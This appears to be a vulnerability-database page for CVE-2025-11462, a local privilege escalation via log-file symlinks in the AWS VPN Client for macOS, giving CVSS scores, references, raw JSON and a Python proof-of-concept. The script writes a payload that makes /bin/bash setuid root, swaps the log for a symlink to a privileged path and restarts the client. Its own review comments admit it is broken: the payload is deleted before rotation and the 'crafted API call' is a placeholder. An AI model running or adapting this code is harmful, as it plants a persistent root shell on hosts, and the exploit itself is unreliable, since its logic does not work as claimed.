Security Vulnerability Report
CVE-2025-11462 CVSS 7.8 HIGH

CVE-2025-11462

Published: 2025-10-07 20:15:34
Last Modified: 2026-04-15 00:35:42
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

Improper Link Resolution Before File Access in the AWS VPN Client for macOS versions 1.3.2 – 5.2.0 allows a local user to execute code with elevated privileges. Insufficient validation checks on the log destination directory during log rotation could allow a non-administrator user to create a symlink from a client log file to a privileged location. On log rotation, this could lead to code execution with root privileges if the user made crafted API calls which injected arbitrary code into the log file. We recommend users upgrade to AWS VPN Client for macOS 5.2.1 or the latest version.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0 (vendor-supplied, Secondary): 9.3 CRITICAL — CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. The 4.0 vector rates the subsequent-system impact High as well, which is why it scores higher than the 3.1 vector shown above.

Configurations (Affected Products)

No CPE configuration data available; the affected range below is taken from the vendor description (1.3.2 through 5.2.0 inclusive, fixed in 5.2.1).

AWS VPN Client for macOS >= 1.3.2
AWS VPN Client for macOS < 5.2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. It is illustrative: nothing on this page shows it was validated against an affected build, and the listing does not demonstrate the "crafted API calls" the advisory refers to.
python
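#!/usr/bin/env python3
# CVE-2025-11462 - AWS VPN Client for macOS Local Privilege Escalation PoC
# Vulnerability: Improper Link Resolution Before File Access (CWE-59)
# Affected: AWS VPN Client for macOS 1.3.2 - 5.2.0
#
# NOTE(review): this listing is a scaffold, not a verified exploit. It does not
# demonstrate the "crafted API calls" the advisory describes, and
# create_symlink() deletes the log file that inject_malicious_payload() just
# appended to, so the injected content never reaches the symlink target.
# Use only on systems you are authorized to test.
import os
import subprocess
import sys
import time

# Configuration
VPN_LOG_DIR = os.path.expanduser("~/Library/Logs/AWSVPNClient/")
TARGET_LOG_FILE = "aws-vpn-client.log"
SYMLINK_TARGET = "/usr/local/bin/pwned"  # Privileged location
# NOTE(review): `chmod 4755 /bin/bash` leaves a persistent SUID shell on the
# host; `id > /tmp/pwned_proof` alone is sufficient proof for a test.
MALICIOUS_PAYLOAD = "#!/bin/bash\nid > /tmp/pwned_proof\nchmod 4755 /bin/bash\n"
PROOF_FILE = "/tmp/pwned_proof"  # must match the path written by MALICIOUS_PAYLOAD

# Inclusive bounds of the affected range from the advisory.
MIN_VULNERABLE = (1, 3, 2)
MAX_VULNERABLE = (5, 2, 0)


def _parse_version(version: str) -> tuple[int, ...]:
    """Turn a dotted version string such as ``"5.2.0"`` into a comparable tuple.

    Parsing stops at the first component that does not start with digits
    (``"2.0-beta"`` -> ``(2, 0)``); an unparsable string yields ``()``.
    """
    parts: list[int] = []
    for piece in version.strip().split("."):
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        if not digits:
            break
        parts.append(int(digits))
    return tuple(parts)


def version_is_vulnerable(version: str) -> bool:
    """Return True if *version* lies within 1.3.2 - 5.2.0 inclusive.

    Short versions are zero-padded to three components so ``"5.2"`` compares
    as ``5.2.0``; longer versions (``"5.2.0.1"``) compare lexicographically and
    therefore fall outside the upper bound.
    """
    parsed = _parse_version(version)
    if not parsed:
        return False
    if len(parsed) < 3:
        parsed = parsed + (0,) * (3 - len(parsed))
    return MIN_VULNERABLE <= parsed <= MAX_VULNERABLE


def check_vulnerable() -> bool:
    """Report whether an AWS VPN Client in the affected range is installed.

    Reads CFBundleShortVersionString from the app bundle's Info.plist via
    ``defaults``. Returns False when ``defaults`` is unavailable (non-macOS),
    the bundle is missing, or the version is outside 1.3.2 - 5.2.0.  The
    original only checked that a version string was present; the range
    comparison is what the comment promised and now does.
    """
    try:
        result = subprocess.run(
            [
                "defaults", "read",
                "/Applications/AWS VPN Client.app/Contents/Info",
                "CFBundleShortVersionString",
            ],
            capture_output=True, text=True, check=False,
        )
    except FileNotFoundError:
        # `defaults` only exists on macOS; the original let this propagate.
        print("[-] `defaults` not found; this check only works on macOS")
        return False
    if result.returncode != 0:
        print("[-] AWS VPN Client bundle not found")
        return False
    version = result.stdout.strip()
    print(f"[*] Detected AWS VPN Client version: {version}")
    if not version_is_vulnerable(version):
        print(f"[-] Version {version} is outside the affected range 1.3.2 - 5.2.0")
        return False
    return True


def inject_malicious_payload() -> None:
    """Append MALICIOUS_PAYLOAD to the client log file.

    Falls back to running ``scutil --nc show`` when the log is not writable.
    NOTE(review): that fallback is a placeholder — it is not the "crafted API
    call" from the advisory and does not put attacker-controlled data into the
    client log.
    """
    log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE)
    try:
        with open(log_path, "a") as f:
            f.write(f"\n[DEBUG] {MALICIOUS_PAYLOAD}\n")
        print(f"[+] Malicious payload injected into {log_path}")
    except PermissionError:
        print(f"[-] Cannot write to log directly, using API simulation")
        # Simulate API call that triggers logging
        subprocess.run(["scutil", "--nc", "show"], capture_output=True)


def create_symlink() -> None:
    """Replace the client log file with a symlink to SYMLINK_TARGET.

    NOTE(review): removing the log discards whatever inject_malicious_payload()
    wrote, so as ordered in main() the payload is lost before rotation.
    """
    log_path = os.path.join(VPN_LOG_DIR, TARGET_LOG_FILE)
    if os.path.exists(log_path) or os.path.islink(log_path):
        os.remove(log_path)
    os.symlink(SYMLINK_TARGET, log_path)
    print(f"[+] Symlink created: {log_path} -> {SYMLINK_TARGET}")


def trigger_log_rotation() -> None:
    """Restart the VPN client app on the assumption that this rotates logs.

    NOTE(review): the advisory does not say what triggers rotation; a restart
    is a guess, and ``killall``/``open`` failures are ignored here.
    """
    subprocess.run(["killall", "AWS VPN Client"], capture_output=True)
    time.sleep(2)
    subprocess.run(["open", "-a", "AWS VPN Client"], capture_output=True)
    print("[*] Triggered log rotation via service restart")


def verify_exploitation() -> None:
    """Print whether the payload ran.

    PROOF_FILE is only created when MALICIOUS_PAYLOAD actually executes, so it
    is the real indicator; the existence of SYMLINK_TARGET alone (what the
    original checked) only shows a file landed there, not that it ran.
    """
    if os.path.exists(PROOF_FILE):
        print(f"[+] Exploitation successful! Payload executed, see {PROOF_FILE}")
    elif os.path.exists(SYMLINK_TARGET):
        print(f"[?] {SYMLINK_TARGET} exists but no execution proof at {PROOF_FILE}")
    else:
        print("[-] Exploitation may have failed")


def main() -> None:
    """Run the PoC steps in order; exits 1 when no affected client is found."""
    print("=" * 60)
    print("CVE-2025-11462 - AWS VPN Client macOS LPE PoC")
    print("=" * 60)
    if not check_vulnerable():
        print("[-] Target does not appear to be vulnerable")
        sys.exit(1)
    # Step 1: Inject malicious payload into log
    inject_malicious_payload()
    # Step 2: Replace log file with symlink to privileged location
    create_symlink()
    # Step 3: Trigger log rotation (runs as root)
    trigger_log_rotation()
    # Step 4: Verify
    time.sleep(3)
    verify_exploitation()


if __name__ == "__main__":
    main()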

References

- https://aws.amazon.com/security/security-bulletins/AWS-2025-020/ (vendor security bulletin)
- https://docs.aws.amazon.com/vpn/latest/clientvpn-user/client-vpn-connect-macos-release-notes.html (macOS client release notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11462", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2025-10-07T20:15:33.590", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Link Resolution Before File Access in the AWS VPN Client for macOS versions 1.3.2- 5.2.0 allows a local user to execute code with elevated privileges. Insufficient validation checks on the log destination directory during log rotation could allow a non-administrator user to create a symlink from a client log file to a privileged location. On log rotation, this could lead to code execution with root privileges if the user made crafted API calls which injected arbitrary code into the log file. We recommend users upgrade to AWS VPN Client for macOS 5.2.1 or the latest version."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/AWS-2025-020/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://docs.aws.amazon.com/vpn/latest/clientvpn-user/client-vpn-connect-macos-release-notes.html", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}